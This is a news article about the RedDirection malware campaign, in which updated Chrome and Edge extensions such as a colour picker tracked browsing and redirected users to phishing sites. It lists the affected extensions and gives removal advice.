Beware the RedDirection Malware: Over 2.3 Million Google Chrome and Microsoft Edge Users Affected!

A new and alarming malware campaign, dubbed RedDirection, has compromised the security of over 2.3 million users on Google Chrome and Microsoft Edge through a series of deceptive browser extensions. This discovery was made by the cybersecurity experts at Koi Security.

At first glance, these extensions appeared completely legitimate. They boasted Google’s verified badge, garnered thousands of downloads, received glowing reviews, and were prominently featured in official stores. However, unbeknownst to users, they transformed browsers into covert surveillance tools.

The campaign initiated with an extension named Color Picker, Eyedropper — Geco colorpick, which had been functioning normally for years. A seemingly innocuous update later turned it into a malicious threat.


Color Picker, Eyedropper – A Deceptively Dangerous Extension

Upon investigating the extension’s command and control framework, researchers discovered it was merely a cog in a much larger scheme. In total, 18 extensions were involved, including various tools like emoji keyboards, video speed controllers, VPNs for Discord and TikTok, dark themes, and volume boosters, all harboring the same malicious code.

Each extension operated under its own distinct domain, creating the illusion of unique developers. However, they were all interconnected through a centralized attack infrastructure that targeted both Chrome and Edge browsers.

Whenever a user opens a tab or visits a website, these extensions capture the page URL and transmit it to a remote server along with a unique tracking ID. Following this, users are redirected to fraudulent sites. The malicious code resides in the extension’s background service worker, operating quietly and activating during every tabs.onUpdated event.

These redirects could lead users to counterfeit Zoom pages prompting them to download a “critical update” or malicious software designed to install further malware. Additionally, some extensions redirect users to phishing pages masquerading as legitimate bank websites.

One of the most concerning aspects of this campaign is that the extensions were not malicious from the outset. Many had been trusted and functional for years until malware was stealthily introduced through subsequent version updates, often without user notification. As Google and Microsoft’s extension platforms automatically update extensions, most users remained oblivious to the transformation of their browsers into tools for tracking and redirection.

Some of the notorious extensions implicated in the RedDirection campaign include:

  • Color Picker, Eyedropper — Geco colorpick
  • Video Speed Controller
  • Unlock Discord
  • Dark Theme
  • Volume Max
  • Emoji Keyboard Online
  • Free Weather Forecast
  • Unlock YouTube VPN
  • SearchGPT – ChatGPT for Search
  • YouTube Unblocked
  • Web Sound Equalizer
  • Flash Player Emulator

Each of these extensions provided seemingly useful features while simultaneously embedding covert hijacking code.

For a detailed list of compromised extension IDs and domains associated with this malware, check out the Koi Security report.

If you have any of these extensions installed, it is crucial to remove them immediately and clear your browser history and site data. Additionally, running a comprehensive malware scan and reviewing all your extensions is highly recommended. Koi Security has also provided Indicators of Compromise (IOCs) to help detect this malware, including extension IDs and malicious server domains.

This campaign underscores a significant flaw in the operation of browser extension marketplaces. RedDirection represents more than just another cyber-attack; it’s a supply chain-level breach where trust signals designed to protect users were exploited. Over 2.3 million users have unwittingly been tracked, redirected, or exposed to attacks simply by installing what appeared to be trusted browser tools.